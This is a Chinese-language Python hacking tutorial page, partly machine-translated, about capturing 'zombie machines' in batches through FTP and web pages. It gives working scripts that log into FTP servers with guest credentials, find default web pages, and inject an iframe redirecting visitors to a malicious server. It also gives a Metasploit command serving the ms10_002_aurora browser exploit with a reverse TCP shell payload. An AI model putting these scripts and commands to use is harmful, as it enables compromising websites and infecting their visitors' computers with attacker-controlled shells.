程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
您现在的位置: 程式師世界 >> 編程語言 >  >> 更多編程語言 >> Python

[Advanced Python scripting] 2.3. Use FTP and Web to capture meat machine in batches (below): search for web pages on the FTP server + inject code

編輯:Python

目錄

一、在FTPSearch the web on the server

1.1、函數:

1.2、實現:

二、Add malicious injection code to web pages

2.1、分析:

2.2、函數:

2.3、實現:


一、在FTPSearch the web on the server

1.1、函數:

ftp.nlst():返回FTP服務器上指定目錄的文件列表

fileName.lower():將字符串中的所有大寫字母轉換為小寫字母

1.2、實現:

有了FTP After the login password of the server,To test to see if the server is availableWeb 服務


first to listFTP 目錄中的所有文件, Search for default web pages.returnDefault()The parameter input to the function is oneFTP 連接, Returns an array of default web pages it finds.It is issued byNLST 命令(Command to list all files in a directory)complete this operation.The function checks one by oneNLST The filename of each file listed by the command is not the defaultWeb 頁面文件名, And add all the default web pages found to a named retList 的數組中.After completing this iterative operation, 函數返回該數組.


運行python defaultPages.py

import ftplib
def returnDefault(ftp):
try:
dirList = ftp.nlst()
except:
dirList = []
print('[-] Could not list directory contents.')
print('[-] Skipping To Next Target.')
return
retList = []
for fileName in dirList:
fn = fileName.lower()
if '.php' in fn or '.htm' in fn or '.asp' in fn:
print('[+] Found default page: ' + fileName)
retList.append(fileName)
return retList
host = '192.168.190.131'
userName = 'guest'
password = 'guest'
ftp = ftplib.FTP(host)
ftp.login(userName, password)
returnDefault(ftp)


二、Add malicious injection code to web pages

2.1、分析:

The web page file has been found, They must be infected with malicious redirection code.In order to quickly create a located athttp://xx.xx.xx.xx:8080/exploit malicious servers and pages,將使用Metasploit 框架,選用的是msl0_002_aurora, ip:8080/exploit The web page on the website exploits a vulnerability in the browser being redirected to it, Make it provide us with a reverse connection, Allows us to control this through this reverse connection“ 肉機”

msfcli exploit/windows/browser/ms10_002_aurora
LHOST=xx.xx.xx.xx SRVHOST=xx.xx.xx.xx URIPATH=/exploit
PAYLOAD=windows/shell/reverse_tcp LHOST=xx.xx.xx.xx LPORT=443 E


If any vulnerable browsers connect tohttp://xx.xx.xx.xx:8080/ exploit這個服務器, It executes the exploit code.一旦成功,will generate a reverseTCPshell, And let's get on this hacked computerWindows命令行提示窗口.有了這個命令shell後, 就能在“ 肉機” Execute the above command with administrator privileges


接下來,To add a piece of code that redirects to our malicious server in the normal web page of the hacked server.We can download the default web page from the hacked server, Insert one in itiframe, This web page with the malicious code inserted is then sent back to the hacked server


injectPage()這個函數,需要給injectPage()函數輸入一個FTP連接、網頁名, as well as indicating this for redirectioniframe字符串,Then download a temporary copy of the web page.接著, It redirects to this one on our malicious serveriframeto this temporary file.最後, The function sends the infected web page back to the hacked server.

2.2、函數:

ftp.retrlines():使用RETRcommand to get multi-line information of a file


storlines (cmd, f):給定 FTP 命令.(如“ STOR filename”),用來上傳文本文件


ftplib.FTP類:實現FTP協議的客戶端,You can use it to write various implementationsFTP作業的Python程序

2.3、實現:

python injectPage.py

import ftplib
def injectPage(ftp, page, redirect):
f = open(page + '.tmp', 'w')
ftp.retrlines('RETR ' + page, f.write)
print('[+] Downloaded Page: ' + page)
f.write(redirect)
f.close()
print('[+] Injected Malicious IFrame on: ' + page)
ftp.storlines('STOR ' + page, open(page + '.tmp'))
print('[+] Uploaded Injected Page: ' + page)
host = '192.168.190.131'
userName = 'guest'
passWord = 'guest'
ftp = ftplib.FTP(host)
ftp.login(userName, passWord)
redirect = '<iframe src= '+'"http://xx.xx.xx.xx:8080/exploit"></iframe>'
injectPage(ftp, 'index.html', redirect)


  1. 上一篇文章:
  2. 下一篇文章:
Copyright © 程式師世界 All Rights Reserved